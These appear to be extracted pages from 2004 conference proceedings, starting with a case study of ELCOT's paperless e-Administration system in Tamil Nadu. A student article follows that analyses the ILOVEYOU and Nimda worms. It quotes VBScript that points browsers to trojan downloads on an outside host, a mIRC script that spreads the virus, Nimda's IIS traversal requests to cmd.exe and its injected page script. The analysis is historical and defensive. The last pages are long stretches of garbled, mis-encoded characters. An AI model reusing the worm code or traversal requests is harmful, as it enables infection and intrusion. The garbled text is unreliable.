Using a tool aptly titled e-Administration Chennai-based ElectronicsCorporation of Tamil Nadu Ltd (ELCOT) withthe help of an Information and CommunicationTechnologies (ICT) organisation called Life-Lineto Business (LL2BCOM) has introduced aworkflow and document management processsans physical movement or use of paper

Designated by the Government of TamilNadu to promote IT industries in the stateELCOT besides supporting IT entrepreneurs also

Case study on ICT and e-GovKrishnan V D G

ICT amp e-Gov Specialistkrisdevgmailcom

promotes joint ventures in electronicscommunication and IT They also help developinfrastructure for the software industry in theform of IT parks and by providing effectivecommunication backbones

LL2BCOMs e-Administration toolallows ELCOT officials to sanction purchasesapprove official activities and transfer filesflawlessly in completely electronic format Witha view to introduce transparency in theirworkflow process all the files processed in theorganisation are made available on a centralserver while the status of pending files can beobtained at any stage There is no physicalmovement of files at any stage only the finalorder copies are printed and stored as physicalrecord

The Nuts and BoltsAs part of its e-governance initiative the

Government of Tamil Nadu embarked on apaper-less office drive for introducingtransparency and accountability in its internaland external transactions

ELCOT the nodal organization for ITactivities in the state decided to introduce e-Administration a paperless FileManagement System which ensures speedydisposal of files The entire process creationmovement monitoring and approval of filestakes place electronically resulting in betterutilisation of manpower This helps avoidingdelays which leads to better governanceaccording to Sudeep Jain IAS MD ELCOT

OITS-2004

33

e-Administration is the brainchild of ICTand e-Gov specialist VDG Krishnan who hasover a quarter of a century hands-on managerialexperience in the Public Sector in India and aleading MNC in North South America He isthe Founder President of Life-Line to Business(LL2BCOM Pvt Ltd) His urge was to developa simple yet effective solution that can help totransform the Governments Corporates SMEsand NGOs The tool was conceived by him afterhis return to India as an apt solution for e-Governance in the developing world based onhis experience in both the developing and thedeveloped world

e-Administration is a web-enabledplatform-independent paperless solutiondeveloped on an Open Source platform forpaperless communication within and outsidean organization It uses open source offeringssuch as J2EE JBOSS PGSQL all running onLinux

The tool according to Krishnan canreduce the cycle time for file approval from anaverage of two to three weeks to one week Thiscan also result in a considerable reduction ofpaper-usage within an organisation therebysaving valuable natural resources

According to Krishnan LL2Bs toolempowers every employee in the organizationto discharge his or her duties efficiently It hasalso reduced the dependence on subordinatesand makes the organization system-orientedrather than people-centric This is likely to resultin increased productivity

Being a Linux platform local languagecontent can also be easily added This tool canbe used by any organization whose activitiesinvolve dealing with multiple agencies forsimultaneous review and action The tool also

aids knowledge management and integrationin NGOs for self-assessment decentralised fieldupdating and centralised review andmonitoring

The ProcessELCOT conducted trials with products

offered by four to five SMEs for independentevaluation with a view to adopt the best toolThe SMEs were asked to implement thenecessary customisations to suit therequirements of ELCOT Govt

Trials were conducted over three to twelvemonths with equal opportunity given to all thevendors In each department one system wasconfigured as the server and five nodes (on anaverage) connected as clients for live testing

Says K Appuswamy General Manager (e-Governance) Many organizations hadconducted trials but only LL2Bs model workedsuccessfully at ELCOT

LL2BCOMs product was one of the fiveLAN based solutions tried out the front-endwas based on Visual Basic while the backendwas Microsoft Access SQL running on aMicrosoft Windows 2000 server in the initialtrials This tool was initially installed inELCOTs Marketing Department for about 5officers Seeing the effective use of the tool moreofficers and staff came forward voluntarily touse the tool Steadily the number was increasedand the solution upgraded to a browser basedweb version for removing the dependence onclient systems

Currently e-Administration systemconnects about 150 users in three differentlocations spread over a distance of about 25 KMsincluding their Corporate Office at Nandanamtheir Communication Division at Perungudy

OITS-2004

34

and their Chairman Mr Vivek Harinarain IASwho is the Secretary IT Govt of Tamil Nadu atthe Secretariat through a dedicated powerfulfour-way Xeon dual Processor with RAIDfacility running a versatile Oracle 9i databaseas backend on Linux advanced server centrallylocated at ELCOT Corporate office

The tool simplifies the process of generatingfiles and enables moving note sheetselectronically for approval Instead of physicallycarrying note sheets for approval from table totable the employees began using the tool Receiptof the e-document was indicated by pop-up alertmessages on the officers monitors

All letters received from external agenciescould now be scanned and converted intoelectronic documents which would then beadded to the central repository This systemenables a user to check the status of a file at anystage More importantly delays are minimisedas the files can be traced instantly through thenetwork employees can now know whichofficer has kept the file pending

The biggest advantage of e-Administration is that it enables us to view atany stage the status of pending file The detailsare available on a central server and can beaccessed by anyone having the authority Thisway workflow is simplified

LL2Bs e-Administration tool not onlyeffects a dramatic reduction of stationary usageand time taken to process documents it alsoserves to introduce transparency in the workingof any organisation

The employees of ELCOT also took to thesystem rather well According to AppuswamyOur employees became more and morecomfortable with using the tool as the trialsprogressed Its quite user-friendly and doesnt

require a lot of technical expertise I myself beganusing the system without any formal trainingand have been using it successfully for eightmonths now

AccoladesAt the 7th National e-Gov conference held

in Chennai in November 2003 MD ELCOTreceived a merit citation award from Governmentof India for implementation of e-Administration as a tool for e-Governance

The Industrial Guidance Bureau of theGovernment of Pondicherry has implementedan integrated e-Platform a quickly customizedsolution of e-Administration to automate theactivities of the Department of Industries andCommerce (Refer Budget 2004-2005 Addressof HE the Lt Governor Pondicherry httpwwwp on nic inopend eptsf in anc elgspeech2004pdf)

Item 7 of the speech reads as followsRemoval of poverty may not be

practically possible without focusing specialattention on creation of gainful jobopportunities The Tenth plan at the nationallevel envisages creation of 50 million newemployment opportunities over a period of fiveyears Therefore focused attention will be givento few critical sectors such as

Industries Information Technology etcwhich have very high employment potential

Item 19 of the speech reads as followsThe manufacturing sector of the economy

has potential to absorb the surplus labour forceThe labour intensive manufacturing units canprovide gainful job opportunities for skilled aswell as semi-skilled labour force We willcontinue to encourage new entrepreneurs tochoose Pondicherry as their destination for

OITS-2004

35

establishing new industrial units andprocedures will be simplified to obtain licence permission to start units We will continue topursue the policies of promoting pollution freeless water and less power consuming industriesin our Union Territory

Item 20 of the speech reads as followsIndustrial Guidance Bureau with

integrated e-Platform has been established bysubstituting single window clearance system tospeed up the process of industrial clearance permission for setting up of new industrial unitsA total of 21 Departments includingMunicipalities Commune Panchayats havebeen integrated with a dedicated electronicnetwork for granting permission to set up anindustry and also to commence production

This saves a lot of time effort and cost toindustrialists and citizens as well as officials ofvarious Departments As against submitting 10copies of documents in the manual system inthe electronic system only one signed copy needsto be submitted thereby saving 90 of paperresulting in conserving of natural forestresources

A unique initiative being attempted for thefirst time in India 21 Departments includingmunicipalities and Panchayats are connectedon a simple dial-up The central repository serverwill be located at the District Industries CentrePondicherry This will form a dedicatedelectronic network The network will allow theGovernment to grant permission for example toset up an industry it can also help amanufacturing unit obtain a Licence tocommence production etc

Says Krishnan This would save a lot oftime effort and cost to industrialists and citizensas well as officials of various Departments As

opposed to submitting 10 copies of documentsin the manual system in the electronic systemonly one signed copy needs to be submittedthereby helping save paper It can help to fuelinvestment in the State and generateemployment for local people

Such an integrated e-Platform can be usedby the ministries and Undertakings of theCentral Government as well as various StateGovernments where ever multiple agencies areinvolved in scrutinizing applications andgranting time bound clearances for planapproval building constructions setting-upindustries etc It can bring about the muchdesired transparency and accountability

Various Central and State GovernmentDepartments and Undertakings including theAndhra Pradesh Technology Services theGovernments of West Bengal Orissa ManipurGoa etc State Bank of India the CanadianConsulate in Chennai British Trade Office(Bangalore) Ministry of Industrial DevelopmentMalaysia and the State of Sarawak Malaysiahave shown interest in e-Administration aweb enabled solution developed using opensource This can considerably cut down thebudget expenditure for e-Governance accordingto Krishnan

Instead of resting on their laurels LL2Bplans to reach out to the various GovernmentDepartments and Undertakings as well asCorporates SMEs and NGOs by implementingtheir solutions in as many public and privateorganisations as possible in India and thedeveloping world by offering the basic solutionfree and charging only for the customisationinstallation training hand holding annualmaintenance and upgrade support eitherdirectly or through ELCOT with whom LL2Bhas a marketing tie-up This is expected to benefit

OITS-2004

36

vastly Governments in India and the developingworld by saving on e-Governance expenditureWe are currently holding discussions with theChennai Metropolitan Development Authority(CMDA) and The Tamil Nadu Dr MGRMedical University to implement e-Administration in their offices institutionsacross the city says Krishnan

Shri D Jayakumar the Hon Minister forIT Govt of Tamil Nadu had stated in the StateAssembly

The Government has also decided to takeup development of four generic softwares paperless office electronic delivery of servicesdevelopment of government portal andintegrated district information system

Of these the paperless office was alreadyin place in ELCOT

While its naiumlve to believe that e-Administration paperless office solutions likeLL2Bs may just be the panacea for our red-taperidden bureaucracy it certainly is a step in theright direction one small step for e-governance a giant leap for democracy

Why ELCOT took the plunge

1 The number of major departments 42 The average number of files generated per

department per year 1503 The average number of physical

movements per file 204 The average number of cycles per file from

start to end 8The total number of manual entries file

movement from desk-to-desk per year4x150x20x8 = 96000 manual entries or filemovements per year

The workload is not evenly distributed asit depends on a hierarchy for granting sanctionandor approval of files The Managing Director(MD) typically has to view and approveapproximately 200 files per week That is anaverage of 40 files per working day This is apartfrom the various meetings he has to attend Filespile up when he is on tour and he is forced tocarry work home When the officer is away filesare kept pending The officer may not even knowthat there are files pending even if they are urgentThese problems cause inordinate delays in theworkflow process A tool such as e-Administration ensures prompt disposal of filesand access to a central database where the statusof files can be monitored at every stage thusensuring efficiency and transparency

Sudeep Jain MD ELCOT confirms thatwhile average cycle time for file approval wasearlier 15 to 21 days after the implementationof the electronic system it was brought down to5 to 7 days

Source E-ADMINISTRATION THE KEY FOR E-GOVERNANCE - INITIATIVES FORCREATING A PAPERLESS OFFICE bySudeep Jain IAS Managing Director ELCOTChennai-35 presented at the 7th National e-Gov Conference in Nov 2003 conducted by theDepartment of Administrative Reforms andPublic Grievances Ministry of PersonnelPublic Grievances and Pension Govt of India

Further enquiries on e-Administration or onimplementing e-Governance Corporate Governancemay be addressed to Mr Krishnan at krisdevgamilcom

OITS-2004

37

Intruders who access networks and systems without authorization or inside attackers withmalicious motives can plant various types of programs to cause damage to the network Theseprograms often lumped together under the general term viruses although other varieties have costcompanies and individuals billions of dollars in lost data lost productivity and the time andexpense of recovery Some of the more destructive examples of malicious code also sometimesreferred to as malware [MALicious softWARE - mark the uppercase MALWARE] over the pastdecade are CIHChernobyl Melissa Code Red Nimda Klez

Now Im going to explain about the two most popular malwares - some exploits which thesemalwares used but NOT how the whole code worked or how to code a malware to exploit

I Love You Worm

The I Love You virus is a little more bulky so I chose not to include the entire script here Youcan download all of the I Love You source from httpwwwpacketstormsecurityorgviral-dblove-letter-sourcetxt

What is interesting to note about the I Love You virus is that it randomly changed the usersdefault Web browser homepage to one of four locations as seen here by the code

num = Int((4 Rnd) + 1)if num = 1 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~young1sHJKhjnwerhjkxcvytwertnMTF wetrdsfmhPnjw6587345gvsdf7679njbvYTWIN-BUGSFIXexe

elseif num = 2 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~angelcatskladjflfdjghKJnwetryDGF ikjUIyqwerWe546786324hjk4jnHHGbvbmKLJKjhkqj4wWIN-BUGSFIXexe

elseif num = 3 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~koichijf6TRjkcbGRpGqaq198vbFV5hfFE kbopBdQZnmPOhfgER67b3VbvgWIN-BUGSFIXexe

elseif num = 4 thenregcreate HKCUSoftwareMicrosoftInternet ExplorerMainStart Pagehttpwwwskyinetnet~chusdgfhjksdfjklNBmnfgkKLHjkqwtuHJB hAFSDGjkhYUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237461234 iuy7thjgWIN-BUGSFIXexe

end ifend if

Known Malware ExploitationAbhishek Bhuyan

KIIT Student

OITS-2004

38

The WIN-BUGSFIXexe turned out to be a Trojan application designed to steal passwordsNow a quick look notices all of the URLs present are on wwwskyinetnet This resulted in manyplaces simply blocking access to that single host While bad for skyinetnet it was an easy fix foradministrators Imagine if the virus creator has used more popular hosting sites such as the membershomepages of aolcom or even made reference to large sites such as yahoocom and hotmailcom would administrators rush to block those sites as well Perhaps not Also had someone at skyinetnetbeen smart they would have replaced the Trojan WIN-BUGSFIXexe with an application that woulddisinfect the system of the I Love You virus That is if administrators allowed infected machinesto download the Trojaned Trojan

I Love You also modifies the configuration files for mIRC a popular Windows IRC chat clientif (s=mirc32exe) or (s=mlink32exe) or (s=mircini) or(s=scriptini) or (s=mirchlp) thenset scriptini=fsoCreateTextFile(folderspecampscriptini)

scriptiniWriteLine [script]scriptiniWriteLine mIRC ScriptscriptiniWriteLine Please dont edit this script mIRC will corrupt if mIRC willscriptiniWriteLine corrupt WINDOWS will affect and will not run correctly thanksscriptiniWriteLine scriptiniWriteLine Khaled Mardam-BeyscriptiniWriteLine httpwwwmirccomscriptiniWriteLine scriptiniWriteLine n0=on 1JOINscriptiniWriteLine n1= if ( $nick == $me ) halt scriptiniWriteLine n2= dcc send $nick ampdirsystemampLOVE-LETTER-FOR-YOUHTMscriptiniWriteLine n3=scriptinicloseHere we see I Love You making a change that would cause the users IRC client to send a copy

of the I Love You virus to every person who joins a channel that the user is in Of course the filenamehas to be enticing to the users joining the channel so they are tempted into opening the file- Nimda Worm -

In September 2001 a very nasty worm reared its ugly head The Nimda (Just reverse nimdaand you get admin) worm also called the Concept viruswas another worm which propagated viaMicrosoft hostsNimda featured multiple methods to infect a host

It could send itself via e-mail It would attach itself as an encoded exe file but would use anaudiox-wave Multipurpose Internet Mail Extensions (MIME) type which triggered a bug in InternetExplorer to automatically execute the attachment upon previewing the e-mail Once the attachmentwas executed the worm would send itself to people in the users address book as well as e-mailaddresses found on Web pages in Internet Explorers Web page cachethat means the worm wouldactually find e-mail addresses on recently browsed Web pages The worm would scan for vulnerableIIS machines looking for the rootexe files left over from the Code Red II and Sadmind worms aswell as using various Unicode and double-encoding URL tricks in order to execute commands onthe serverThe following is a list of requests made by the worm

GET scriptsrootexec+dir

OITS-2004

39

GET cwinntsystem32cmdexec+dirGET dwinntsystem32cmdexec+dirGET MSADCrootexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scriptsxc1x1cwinntsystem32cmdexec+dirGET scriptsxc0winntsystem32cmdexec+dirGET scriptsxc0xafwinntsystem32cmdexec+dirGET scriptsxc1x9cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts35cwinntsystem32cmdexec+dirGET scripts5cwinntsystem32cmdexec+dirGET scripts2fwinntsystem32cmdexec+dirGET _vti_bin5c5c5cwinntsystem32cmdexec+dirGET _mem_bin5c5c5cwinntsystem32cmdexec+dirGET msadc5c5c5cxc1x1cxc1x1cxc1x1cwinntsystem32

cmdexec+dirOnce the worm found a vulnerable IIS server it would attempt to Trivial File Transfer Protocol

(TFTP) the worm code to the target server It would also modify the IIS server by creating a guestaccount and adding it to the Administrators group It would also create a Windows share of theC drive (using the name C$)

All local hypertext markup language (HTML) and Application Service Provider (ASP) fileswould be modified to include the following code snippet

ltscript language=JavaScriptgtwindowopen(readmeeml null resizable=notop=6000left=6000)ltscriptgtIn addition the worm would copy itself to the readmeeml file The final result was that

unsuspecting Web surfers would automatically download and possibly execute the worm froman infected Web site

The worm copies itself into EML and NWS in various local and network directories If anunsuspecting user uses Windows Explorer to browse a directory containing these files it is possiblethat the automatic preview function of Explorer would automatically execute the worm This wouldallow the worm to propagate over file shares on a local network

The worm also copies itself to richeddll which is an attempt to Trojan Microsoft Officedocuments since documents opened in the same directory as the richeddll binary will load andexecute the Trojan DLL

The end result was a noisy but very effective worm It was noisy because it created many EMLand NWS files on the local system It also modified Web pages on the Web site which made it easyto remotely detect a compromised server But the multi-infection methods proved quite effective andmany people who had run through and removed the worm had found that their systems keptgetting infectedit is a tough worm to fully eradicate To properly combat it the securityadministrator needed to patch their IIS server upgrade their Microsoft Outlook client and be cautiousof browsing network shares Full information on the Nimda worm is available in the Security Focusanalysis

httparissecurityfocuscomalertsnimda010921-Analysis-Nimda-v2pdf

OITS-2004

40

Some tips on prevention and responseProtecting systems and networks from the damage caused by Trojan horses viruses and

worms is mostly a matter of common sense Practices that can help prevent infection include thefollowing Do not run executable (EXE) files from unknown sources including those attached to an e-

mail or downloaded from web sites Turn off the Preview andor HTML mail options in the e-mail client program Do not open Microsoft Office documents from unknown sources without first disabling

macros Be careful about using diskettes that have been used in other computers Install and use firewall software Install antivirus software configuring it to run scans automatically at predefined times and

updating the definition files regularly Use intrusion prevention tools called behavior blockers that deny programs the ability to

execute operations that have not been explicitly permitted Use integrity checker software (such as Tripwire) to scan the system for changes Recognizing the presence of a malicious code is the first-response step if a system gets infected

Administrators and users need to be on the alert for common indications that a virus mightbe present such as the followingMissing files or programsUnexplained changes to the systems configurationUnexpected and unexplained displays messages or soundsNew files or programs that suddenly appear with no explanationMemory leaks (less available system memory than normal)Unexplained use of disk spaceAny other odd or unexplained behavior of programs or the operating system

- If a virus is suspected a good antivirus program should be installed and run to scan thesystem for viruses and attempt to remove or quarantine any that are found Finally allmission-critical or irreplaceable data should be backed up on a regular basis in case all thesemeasures fail

Virus writers are a creative and persistent bunch and will continue to come up with new waysto do the impossible so computer users should never assume that any particular file type or OSis immune to malicious code The only sure way to protect against viruses is to power down thecomputer and leave it turned off -)

Information about specific viruses and instructions on how to clean an infected system isavailable at httpwwwsymanteccom and httpwwwmcafeecom Both antivirus vendorsprovide detailed databases that list and describe known viruses But I recommend being touch withthe site httpwwwsecuritynewsportalcom here you will get hourly updates about latest securityhacking virus and trojan news

luckylucky-webnethttpwwwlucky-webnet

Orissa Network Security Group httpgroupsyahoocomgrouporissa-netsec

OITS-2004

41

LOtilde`EcircOcircVethornethorn S_ecirc J aTHORNLETHhOgraveSOcircETH[THORN eamp_ OgravekthornETH[ETH

LTHORNVccedil XTHORNcccedilXccedil aTHORNhegraveaTHORN]OcircETHfmacrAElig bEcircthornaOgrave_hegraveethorn

ASTHORNLETHmTHORNthorn LfETH aTHORNsETH_ aETHZTHORNSOcirc ethornETHS_Ntilde[THORNHaOtilde agrave_Ntilde[THORN A]THORN jcordfAElig Ogravel[oumlOgraveethorn LOtilde`EcircOcircVeethornthornakEcircthornf aOcircakthornETHethorn OgravekthornDRTHORNfrac14frac14ETH Ograve[ZEcirc HkTHORNthorn dsectAEligVTHORNaTHORNimacrAEligOgraveethorn LTHORNRTHORN SETHZTHORNaETH Acethorn jETHcETHSTHORNL LragravethornaOcircfrac14frac14ETHd]THORNJ LOtilde`EcircOcircVethorn aTHORNsETH_ HL A^Ecirc_THORNL aTHORN]OcircETHbthornETHaOgraveethorn `eTHORNthornNZTHORN[ HkthornETH `EcircethornETH[_ dEcircNeEcircthorn aTHORNhegraveethornjcordfAElig aTHORN]OcircETHOgraveethorn Aacutecurren akEcircthornOgrave[ D`OgravedETHN OgravekthornETHBAjEcircRTHORNfrac14frac14ETH HL]ETH SOgraveZ XETHbrvbarAEligethorn SOgraveZ LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL HaOtilde jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14 c^OcircOgraveethorn aTHORNaETH]mthornETHNTHORNmthornETHfrac14frac14ETH XETHbrvbarAEligethorn dEcircbrvbarTHORNAEligLOgravemthorn bthornNaETH_ccedil A]ETHcccedilEcircfrac14NYIumlTHORNOgravemthornfrac14frac14ETH Bbccedilthorn OgraveplusmnAEligETH`QETHethorn cETH^OcirccOgraveethorn A]ETHcccedilfrac14NbagravethorneEcircthorn AaTHORNbagravethornETHa OgravekthornOgravemthornfrac14frac14ETH `Ograveethorn `Ograveethorn joacutefrac12THORNcurrenaYIumlTHORNQETHmTHORNthornmthornETHfrac14frac14ETH Ograve[ZEcirc XETHbrvbarAEligethornNtilde aTHORN]OcircETH kUacutethorn jaagrave EcircethornETH[_frac14frac14ETHHkthornETH hEcircZTHORN jTHORNbTHORNthornmccedilthorn dsectAEligNtilde LkTHORNthornOgravemthorn _UumlETH _UumlETH bthornNaETH_ccedil`otildeOgravec jegraveNagraveLEcirc _THORNcagraveETHZ LOgravemthornfrac14frac14ETH HkthornETH`Ograveethorn `oacuteTHORNaNtildejoacutefrac12THORNcurren OgravekthornmthornETHfrac14frac14ETH OgravejTHORN ETHBUuml jTHORNbTHORNthornmccedilthorn dsectAEligNtildefrac14ethornAahOcircL[ETH OgravekthornETHBTHORNmthornETHfrac14frac14ETH Ograve[ZEcirc jTHORNbTHORNthornmccedilthorn BampTHORNfrac14_THORN AEligeTHORNOtildethornOgravekthornDRTHORN jaagrave EcircethornETH[_ aTHORN]OcircETHfrac14frac14ETH jaEcirc hEcircZTHORN LOtilde`EcircOcircVethornaTHORNOgravehyacuteiL Aacutecurren kthornjTHORN Drthornethorn Ograve]Ogravemthorn A`ZcETHOgrave_`otildeOgrave[OcircL aTHORN]OcircETHLEcirc HL _THORN~Ugravefrac12curren LotildecOgraveethorn `otildeLETHhLeEcircthornRlaquoTHORNAEligAEligfrac14frac14ETH agraveETH[ccedil HL LETHdagraveOcirc jeTHORNthornaETH `Ograveethorn ]eacuteTHORN[NtildemacrAEligLETHdagraveOcirc LeTHORNthornaETHethorn `w[THORN OgraveLDUuml aTHORN]OcircETHOgraveethorn ethornkTHORNthornRTHORN HkthornETH hEcircZTHORNaETH`Ograveethorn XETHbrvbarAEligethorn HaOtilde jTHORNbTHORNthornmccedilthorn BOtildeSTHORN_THORN AEligethornordfAElig AEligAElig OgravekthornETHB dETHBTHORNOgravemthornfrac14frac14ETH HkthornETHkUacutethorn LOtilde`EcircOcircVethorn aTHORN]OcircETHethorncEumlfcsectAEligfrac14frac14ETH LOtilde`EcircOcircVethornethorn aTHORNaragravethorn_LEcirc _Ecirc OcircETH_ LOgravemthorn

AOgravecdividecETHOgrave_ SETHZTHORN ETHeTHORNthornaETH Ograved A^Ecirc_THORNL LOtilde`EcircOcircVethornethornS_L OgravekthornDRlaquoTHORNAEligAElig QETHmccedilthornjagrave aOcircETHOgraveaSccedilfrac14frac14ETH Ogravej 1834cjTHORNkthornETHOgraveethorn A_ETHmTHORNthornVTHORNLETHmccedilthorn BampTHORNfrac14_ccedil _ETHcLLOtilde`EcircOcircVethornVTHORNH DiexclthornETHa_ LeTHORNthornBOgravemthornfrac14frac14ETH `Ograveethorn `OgraveethornS_ccedil bTHORNthorn_THORNOgravejAtildeccedilcurren AVETH_ETHj$ccedilfrac14 HaOtilde LiacuteTHORNOgrave$frac14ETHXagraveIuml OgraveaeTHORNthorncTHORNhTHORN ABgETH Ogravefrac12currenVccedil macrEcircAElig_THORNbthornethornjTHORNVTHORNOgraveethorn `otildecBOgravemthornOgraveIacuteAEligETH_THORNLccediljccedil (Electronics) LOtilde`EcircOcircVethorn[THORNAeTHORNthorn LeTHORNthornTHORNOgravemthornfrac14frac14ETH HkTHORNthornWETHOgraveethorn kUacutethorn $frac14ETHfrac12currenOgraveSOgrave_Ograveethornj_ccedil (First Generation)LOtilde`EcircOcircVethornethorn S_ecirc OgravekthornETHBTHORNmthornETHfrac14frac14ETH ]eacuteTHORN[NtildemacrAElig aTHORNhegravedEcircwjcmacrAEligOgraveethorn H_THORNALccedil (ENIAC) LOtilde`EcircOcircVethorn _THORNcUgrave[OgravekthornETHBTHORNmthornETHfrac14frac14ETH 1946 cjTHORNkthornETHOgraveethorn _THORNcUgrave[ HkTHORNthornLOtilde`EcircOcircVethornLEcirc ethornMTHORNaETH `ETHBUuml 50 $Ecircfrac14Vccedil x 30 $Ecircfrac14VccedilOethornethorn AahOcircL[ETH OgravekthornETHBTHORNmthornETH HaOtilde HkthornETHethorn JS_THORNmthornETH 30 V_ccedilfrac14frac14ETH HkTHORNthorn LOtilde`EcircOcircVethornOgraveethorn 18000bthornOcircETHLEcirccccedil VEcircOcircaccedil (Vaccum tube) mthornETHNTHORNTHORNmthornETHfrac14frac14ETHHkthornETH HL OgravejOgraveLumlAEligOgraveethorn 5000 `dagraveOcirclaquoAElig cTHORNhETHZ(Addition) LeTHORNthorn `ETHeEcircthornTHORNmthornETHfrac14frac14ETH HkthornETH c_EcirciOcircWETHeEcircthorn[OcirclaquoAEligAElig lTHORN otilde THORNmthornETHfrac14 j[ cETH[ouml aragravethorncETH_ethornLOtilde`EcircOcircVethornWETHeEcircthorn dOgravefrac12curren cxethorn THORNmthornETHfrac14frac14ETH `Ograveethorn `Ograveethorn1948 cjTHORNkthornETHOgraveethorn HLVagrave HaOtilde cOcircETHLccedilOgravemthorn cTHORNhTHORNHXccedilbthornETHLccedil (EDVAC) _ETHcL HL D_iuml[cETH_ethornLOtilde`EcircOcircVethornVTHORNH Ograve`_ccediljTHORNmccedilthornbthornETH_THORNAUuml aTHORNhegraveaTHORN]OcircETHfmacrAEligOgraveethornDiexclthornETHa_ LOgravemthornfrac14frac14ETH 1951Ograveethorn ]EcircOgravekthornUuml cTHORNhTHORN Ogravej_ccediljjccedilaEcircOcircOgraveethornETH (Census beaureau)Ograveethorn aOcircakthornETHethorn

OITS-2004

42

`ETHBUuml macrEcircAElig_THORNbthornETHLccedil LOtilde`EcircOcircVethorn [THORNAeTHORNthorn LOgravemthornfrac14frac14ETH HTHORNOgraveethornQEcirccegraveLNtildemacrAElig OgraveV`ccedilOgraveethorn [Ocirc ethornkTHORNthornaETH Aethorncdivide OgravekthornmthornETHfrac14frac14ETHHkthornETH OgravekthornDRTHORN `otildec aOcircajETHmacrTHORNAEligL bTHORNthornrTHORNthornOgraveethorn aOcircakoacutethorn[LOtilde`EcircOcircVethornfrac14frac14ETH HkTHORNthorn `otildec `THORNYIumlNtildeethorn LOtilde`EcircOcircVethorn [oacuteVTHORNdEcircbrvbarAEligTHORNmthornETH HaOtilde Ograve_L SETHNETH cETHXIumlTHORN ajEcircTHORNmthornETHfrac14frac14ETH 1947cjTHORNkthornETHOgraveethorn Ograveamccedilthorn mthornETHOgraveaETHOgraveethornOgraveVETHeTHORNthornOgraveethorn (Bell Lab)VoumlETH_ccedilSTHORNfrac12currenethornethorn DiexclthornETHa_ OVTHORNTHORNmthornETHfrac14frac14ETH bthornOcircETHLEcirccccedil VEcircOcircaccedila]fOgraveethorn VoumlETH_ccedilSTHORNfrac12currenethornethorn aOcircakthornETHethorn ]eacuteTHORN[NtildemacrAElig `THORNYIumlNtildeethornLOtilde`EcircOcircVethornLEcirc S_ecirc Ograve]mthornETHfrac14frac14ETH Lcccedil Mnagrave OgraveRETHV ALETHethornHaOtilde ^THORNL aTHORNhegraveordfAElig OgravekthornETHBTHORNaETHeEcircthorn HkTHORNthorn `THORNYIumlNtildeethornLOtilde`EcircOcircVethornethorn QETHkTHORNthorn]ETH aoacutewTHORN `ETHBmthornETHfrac14frac14ETH cETH[ouml NETHZTHORN[THORNLHaOtilde aOcircajETHmacrTHORNAEligL aTHORNOgravehyacuteiZ `ETHBUuml ]EcircB`otildeLETHethornethorn`w[THORN aOcircakoacutethorn[ OgravekthornDTHORNmthornETH dETHkthornETHLTHORN [OcirclaquoAEligAElig MnagraveETHlaquoAEligAEligaOcircETH`ETHethorn THORNmthornETHfrac14frac14ETH 1958Ograveethorn BAtildeTHORNcurrenOgraveNotildeOgraveVXccedil jLUgraveVccedil(Integrated circuit) DiexclthornETHaTHORN[ OgravekthornaETH`OgraveethornXTHORNSTHORNVETHmccedilthorn LOgrave`agraveETHOgraveethornj_ccedil (DigitalCorporation) OgraveNETHVTHORNH cTHORN_THORN LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETH dETHkthornETHLTHORN 15000 XmthornETHethornccedilOgraveethorn aTHORNLotildeTHORNOgravekthornETHBTHORNmthornETHfrac14frac14ETH `Ograveethorn ABaTHORNHcccedil (IBM) c^Ocirc[ETHethorn 360 jTHORNeTHORNthornSccedil (series) LOtilde`EcircOcircVethorn [THORNAeTHORNthornLmthornETHfrac14frac14ETH HkTHORNthornjaEcirc LOtilde`EcircOcircVethornNEcircXIumlTHORNL [oacute[NtildemacrAElig `THORNYIumlNtildeLOtilde`EcircOcircVethorn bthornETHaOgraveethorn `eTHORNthornNZTHORN[frac14frac14ETH `otildeOgravecOgrave`otildeETHNotildeETHcccedilethorncETHOgrave_ `iacuteNccedil OgraveaETHXagrave HaOtilde [ETHethorn aOcircakthornETHethornLeTHORNthorn LOtilde`EcircOcircVethorn jkthorn OgravedETHNETHOgravedETHN LeEcircthornTHORNOgravemthornfrac14frac14ETHHTHORNOgraveethorn 0 HaOtilde 1 LEcirc aTHORNbTHORNthorn_iuml YETHqETHOgraveethorn HAtildeoumlTHORNcurrenLethornETHdETHDTHORNmthornETHfrac14frac14ETH `Ograveethorn OgraveLETHamccedilthorn HaOtilde $frac14ethornccedilVoumlETH_ccedil `eTHORNthornbthornETHiETH HkTHORNthorn Lfrac12currenLethorn `w[THORNLEcirc jethornf LeTHORNthornOgrave]mthornETHfrac14frac14ETH1971 cjTHORNkthornETHOgraveethorn BOgraveAtildecurrenmccedilthorn _ETHcL HL LshyAEligETH_NtildecETHBOgraveLotildeETHOgrave`otildeETHOgravejjeccedilthorn (Microprocessor)

